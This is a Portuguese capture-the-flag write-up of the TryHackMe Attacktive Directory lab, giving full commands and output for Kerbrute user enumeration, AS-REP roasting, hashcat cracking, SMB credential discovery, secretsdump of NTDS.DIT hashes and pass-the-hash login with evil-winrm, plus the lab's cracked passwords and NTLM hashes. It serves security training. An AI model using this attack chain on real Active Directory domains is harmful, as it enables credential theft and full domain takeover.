🪟Attacktive Directory

Olá, viajante! Neste artigo, trago um write-up do desafio Attacktive Directory.

Contexto

Temos o seguinte alvo: um Controlador de Domínio (DC) com o endereço IP 10.10.209.6. O desafio em si também já nos fornece o domínio.

Tipo: Controlador de Domínio (DC)

IP: 10.10.209.6

Domínio: spookysec.local

Reconhecimento

Para começarmos o reconhecimento, podemos coletar diversas informações através da ferramenta Enum4linux.

enum4linux 10.10.209.6

[...] 
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[...]

1. What tool will allow us to enumerate port 139/445? [enum4linux]

2. What is the NetBIOS-Domain Name of the machine? [THM-AD]

3. What invalid TLD do people commonly use for their Active Directory Domain? [.LOCAL]

Enumeração de usuários

Para a próxima tarefa, devemos realizar a enumeração de usuários do domínio através da ferramenta Kerbrute (que compõe o conjunto de classes python Impacket), utilizando os dicionários de usuários e senhas providos pelo próprio desafio.

Através da flag -h, você pode ver as opções válidas e necessárias para descobrir os usuários.

/kerbrute -h

Executando a enumeração de usuários:

./kerbrute userenum --dc 10.10.209.6 -d spookysec.local /usr/share/wordlists/attacktive-directory/userlist.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/08/23 - Ronnie Flathers @ropnop

2023/01/08 18:26:19 >  Using KDC(s):
2023/01/08 18:26:19 >   10.10.209.6:88

2023/01/08 18:26:20 >  [+] VALID USERNAME:       james@spookysec.local
2023/01/08 18:26:26 >  [+] VALID USERNAME:       svc-admin@spookysec.local
2023/01/08 18:26:39 >  [+] VALID USERNAME:       James@spookysec.local
2023/01/08 18:26:43 >  [+] VALID USERNAME:       robin@spookysec.local
2023/01/08 18:27:31 >  [+] VALID USERNAME:       darkstar@spookysec.local
2023/01/08 18:27:59 >  [+] VALID USERNAME:       administrator@spookysec.local
2023/01/08 18:29:23 >  [+] VALID USERNAME:       backup@spookysec.local
2023/01/08 18:30:03 >  [+] VALID USERNAME:       paradox@spookysec.local
2023/01/08 18:33:50 >  [+] VALID USERNAME:       JAMES@spookysec.local
2023/01/08 18:34:59 >  [+] VALID USERNAME:       Robin@spookysec.local
2023/01/08 18:43:09 >  [+] VALID USERNAME:       Administrator@spookysec.local

4. What command within Kerbrute will allow us to enumerate valid usernames? [userenum]

5. What notable account is discovered? [svc-admin]

6. What is the other notable account is discovered? [backup]

Exploração

Agora que já possuímos vários usuários válidos no domínio, podemos utilizar um ataque de força-bruta. Nesse caso, utilizaremos um ataque chamado ASREPRoasting.

Um ataque ASREPRoasting ocorre quando uma conta de usuário tem o privilégio "Does not require Pre-Authentication" definido. Isso significa que a conta não precisa fornecer uma identificação válida antes de solicitar um ticket Kerberos para a conta de usuário em questão.

Para esse tipo de ataque, utilizaremos outra classe do conjunto Impacket, chamado GetNPUsers, que nos permitirá saber as contas suscetíveis a ASREPRoasting presentes no KDC (Key Distribution Center). O único requisito para consultar as contas é um conjunto válido de usuários (que já enumeramos via Kerbrute).

python /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile users2.txt -dc-ip 10.10.209.6 spookysec.local/

Impacket v0.10.1.dev1+20221214.172823.8799a1a2 - Copyright 2022 Fortra

[-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:50822f1bbf7182827b71ddbcc8e8067a$81909570e086df06568c0ae7658e6bd2dd3e934c652adfd058f58b457e97a5767f78197a9c6fa1ac403df49eeeabd3582f3e007b2695b3c8829f3b02ee33e4f812768d19c710eb7ce550a15529a8e7b726ed4a6edc6583bb3093a94a7b553cc60e80b36c2954b37448682baf36227f2df69b133d854e29f1d025c27902971e95de3cc56335adc6d03ae14e2a031a98d5743d345226a46e52a78376da35609862b6d06f2d45cbfc9ceda36ae973e72c4de033b3e59301f4b5f3980acecc174281e4d0dc2d965b75ef06910057443d1e26111ad1b485a32555a1029d5521cfa0f3baddb8b386e1d445c2b472eb5ca5bbd3a3db

7. We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password? [svc-admin]

Descobrimos um usuário válido e suscetível a ASREPRoasting. Agora, para quebrar a hash utilizando o dicionário de senhas que salvamos previamente, precisamos descobrir qual o tipo de hash que acabamos de encontrar. Para isso, podemos consultar na lista de hashes do Hashcat.

Como existem muitos tipos de hashes Kerberos 5 na lista do Hashcat, devemos analisar minuciosamente o formato da hash para descobrirmos qual modo utilizar em sua quebra.

8. Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? [Kerberos 5 AS-REP etype 23]

9. What mode is the hash? [18200]

Agora podemos tentar quebrar a hash utilizando o Hashcat.

hashcat -m 18200 hash.txt /usr/share/wordlists/attacktive-directory/passwordlist.txt

$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:b6fa4c0ae56445ebc248205fe51a2258$399c4cadfb39280a56b80003cdfbf7cf8f73c667cc5fbabad698611853c9d0726ec290a23395c04a343df7a57ab99c36e02f972792b688d9787830a82e7f1505a545484c5c50289142a98449293f26bacc1a57dd691a8eb6c555bc9ccb5b2ef33b23da91128b51e26b1445555991b6d1dc0de7e732e6eed3658ef3c238272e9586f60aa36e58719e23228f205b800091ba9670f5ccb57d3d823143b334529ee1d75ab8946e585612df55b37bd7b94392e4efa64a1dacbac3e23c95862ca7981eaf4b6516b25526b63f93ae1930cf1c0c9aa49c975abff82557186018006edeaa5b7addd211a2c8e09f6a6a6bcf4ec4471f3c:management2005

10. Now crack the hash with the modified password list provided, what is the user accounts password? [management2005]

Temos uma credencial válida. Utilizando essa credencial, precisamos agora enumerar os shares do servidor, utilizando a clássica ferramenta SMBClient.

11. What utility can we use to map remote SMB shares? [smbclient]

Executando a seguinte linha de comando, podemos listar os shares ativos:

smbclient -L \\\\10.10.209.6 -U spookysec.local/svc-admin

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
backup          Disk      
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
SYSVOL          Disk      Logon server share

12. Which option will list shares? [-L]

13. How many remote shares is the server listing? [6]

14. There is one particular share that we have access to that contains a text file. Which share is it? [backup]

Acessando o share backup com as credenciais que encontramos, conseguimos descobrir um arquivo.

smb: \> ls
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

                8247551 blocks of size 4096. 3687835 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

$ cat backup_credentials.txt 
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

15. What is the content of the file? [YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw]

O conteúdo do arquivo parece ser um Base64. Decodificando via linha de comando no Linux, obtivemos o seguinte resultado:

$ cat backup_credentials.txt | base64 -d
backup@spookysec.local:backup2517860

16. Decoding the contents of the file, what is the full contents? [backup@spookysec.local:backup2517860]

Escalação de Privilégio

Agora que já possuímos acesso ao servidor, podemos tentar elevar nosso privilégio. Pra isso, utilizaremos a ferramenta secretsdump.py, também compondo o conjunto Impacket. Se conseguirmos coletar hashes, podemos tentar elevar privilégios utilizando o método Pass the Hash.

python /opt/impacket/examples/secretsdump.py spookysec.local/backup:backup2517860@10.10.209.6

[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:1ced74bb19b4fd8a6e0bf41ad102b86f:::

17. What method allowed us to dump NTDS.DIT? [DRSUAPI]

18. What is the Administrators NTLM hash? [0e0363213e37b94221497260b0bcb4fc]

19. What method of attack could allow us to authenticate as the user without the password? [Pass the Hash]

A vigésima flag aparentemente nos indica a utilizar a ferramenta Evil-WinRM, que se aproveita justamente da falha Pass the Hash.

evil-winrm -i 10.10.209.6 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

20. Using a tool called Evil-WinRM what option will allow us to use a hash? [-H]

Para cumprir a última parte do desafio, precisamos apenas coletar os arquivos de texto presentes na pasta Desktop de cada usuário indicado. Você consegue fazer isso sozinho. :)

PreviousTryHackMe NextBasic Pentesting

Last updated 4 months ago